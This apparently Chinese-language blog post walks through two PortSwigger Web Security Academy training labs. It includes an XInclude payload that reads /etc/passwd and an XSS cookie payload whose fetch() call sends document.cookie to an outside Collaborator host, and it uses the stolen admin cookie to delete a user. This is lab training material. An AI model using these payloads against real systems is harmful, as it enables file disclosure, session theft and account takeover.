Burp Web Academy Essential Skills

发表于 分类于

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场,在学习 Web 安全知识的同时,还可以练习 Burp Suite 的实战技能。

本篇文章讲解 Web Security Academy 之中的 Essential Skills。

0x02. Essential Skills

2.1 Lab: Discovering vulnerabilities quickly with targeted scanning

This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of /etc/passwd within 10 minutes.

Due to the tight time limit, we recommend using Burp Scanner to help you. You can obviously scan the entire site to identify the vulnerability, but this might not leave you enough time to solve the lab. Instead, use your intuition to identify endpoints that are likely to be vulnerable, then try running a targeted scan on a specific request. Once Burp Scanner has identified an attack vector, you can use your own expertise to find a way to exploit it.

访问测试系统后,发现商品详情页面有一个库存检查功能:

1
2
3
4
5
6
7
8
POST /product/stock HTTP/2
Host: 0ae0005e03636a878056674400f80036.web-security-academy.net
Cookie: session=i9MgRqLvPyTzSRzyOjpeu8wMFOjANkOq
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Accept: */*

productId=4&storeId=1

按照提示,可以使用 Burp Scanner 进行扫描,但题目有时间限制,所以这里直接将请求发送到 Do Active Scan 菜单项,直接针对这个 API 接口进行测试。在 Burp 的 Dashboard 页面,很快可以看到扫描出了 XML Injection 漏洞:

1
2
3
4
5
6
7
8
POST /product/stock HTTP/2
Host: 0ae0005e03636a878056674400f80036.web-security-academy.net
Cookie: session=i9MgRqLvPyTzSRzyOjpeu8wMFOjANkOq
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Accept: */*

productId=%3crir%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2far5fnqihrdtfwbmeyjqh2nyv6mcf05o6cyzond.oastify.com%2ffoo%22%2f%3e%3c%2frir%3e&storeId=1

Payload 解码如下:

1
<rir xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://ar5fnqihrdtfwbmeyjqh2nyv6mcf05o6cyzond.oastify.com/foo"/></rir>

HTTP Response 如下:

1
2
3
4
5
6
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 57

"Invalid product ID: xo3nj1ouuvoiv4xkq4yo00zjlgigtgkfigz"

提示信息中的 xo3nj1ouuvoiv4xkq4yo00zjlgigtgkfigzhttp://ar5fnqihrdtfwbmeyjqh2nyv6mcf05o6cyzond.oastify.com/foo 返回的内容。所以,这里存在明显的 XML 注入漏洞。

现在,需要把 URL 换成本地文件路径,参考 What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy

XInclude attacks

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service.

In this situation, you cannot carry out a classic XXE attack, because you don’t control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

1
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

也就是说,当我们无法控制整个 XML 文档来实现 XXE 攻击时,可以尝试使用 XInclude 来通过单个 XML 元素实现类似的攻击效果。直接对上述 Payload 进行 URL 编码,然后填充到 productId 参数即可。

1
2
3
4
5
6
7
8
9
10
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2338

"Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......

2.2 Lab: Scanning non-standard data structures

This lab contains a vulnerability that is difficult to find manually. It is located in a non-standard data structure.

To solve the lab, use Burp Scanner’s Scan selected insertion point feature to identify the vulnerability, then manually exploit it and delete carlos.

You can log in to your own account with the following credentials: wiener:peter

不同版本的 Burp Suite,这个 Scan selected insertion point 位置还有所区别,看网上 v2023.10.3.6 在 Burp Repeater 的右键菜单就有这个功能,而我使用的 Burp Suite Pro v2022.9 在 Burp Repeater 的右键菜单中并没有这个选项。

找了一圈,在 Burp Intruder 中找到了,我们需要先标记 Cookie 中的用户名,即 Intruder 中通过 § 标记的字段,就是所谓的 Insertion Point。

1
2
3
GET /my-account?id=wiener HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session=§wiener§%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

然后右键,在菜单项中选择 Scan defined insertion point,名字和 Scan selected insertion point 有稍许区别。第一次扫描,在 Dashboard 页面查看结果,尽然啥也没有,需要在 Burp Intruder 中重新发送到已有的 Task 进行扫描,才可以扫出来 XSS 漏洞,这个过程有点奇怪。

XSS Payload 如下:

1
2
3
GET /my-account?id=wiener HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f2dgr3z719psdx3m3qu50u2rfp6vzjp7hx5ovblza%5c.oastify.com%60%3e%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

解码后如下:

1
'"><svg/onload=fetch`//2dgr3z719psdx3m3qu50u2rfp6vzjp7hx5ovblza\.oastify.com`>:fK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

这里面有个坑,像上面这样的写法(fetch 的参数没有使用括号),只是访问域名的话没问题,而如果再带上 Cookie 则在 Burp Collaborator 中收不到响应。所以,这里参考官方答案使用了 fetch(`...`)

现在我们在 Burp Collaborator 页面复制一个地址出来,并填充到我们的 Payload:

1
2
3
GET /my-account?id=wiener HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session='%22%3e%3csvg%2fonload%3dfetch(%60%2f%2fcaqlal36hoxzswk7v1v9ywvd44avylma.oastify.com%2f%24%7bencodeURIComponent(document.cookie)%7d%60)%3e%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

解码后的 Payload 如下:

1
'"><svg/onload=fetch(`//caqlal36hoxzswk7v1v9ywvd44avylma.oastify.com/${encodeURIComponent(document.cookie)}`)>:fK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

可以在 Burp Collaborator 中收到 administrator 的 Cookie:

1
GET /session%3Dadministrator%253a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN%3B%20secret%3DYrOMza2cQ2ee89bvPLT1WW1pFIGRm8Cr%3B%20session%3Dadministrator%253a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN HTTP/1.1

解码后如下:

1
session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN; secret=YrOMza2cQ2ee89bvPLT1WW1pFIGRm8Cr; session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN

使用这个 Cookie 访问站点,然后删除用户 carlos 即可。

1
2
3
GET /admin/delete?username=carlos HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN; secret=YrOMza2cQ2ee89bvPLT1WW1pFIGRm8Cr; session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN

0x03. 小结

  • 通过 XInclude 实现类似 XXE 的攻击效果

  • 熟悉 Burp Scanner 的使用方法

    • 指定 API 快速扫描 - Active Scan
    • 指定字段扫描 - Scan defined insertion point 或者 Scan selected insertion point

  • fetch 用法

  • JavaScript 模板参数

1
`${expression}`

0x04. 参考文档

  1. https://portswigger.net/web-security/all-labs#essential-skills
  2. https://portswigger.net/web-security/xxe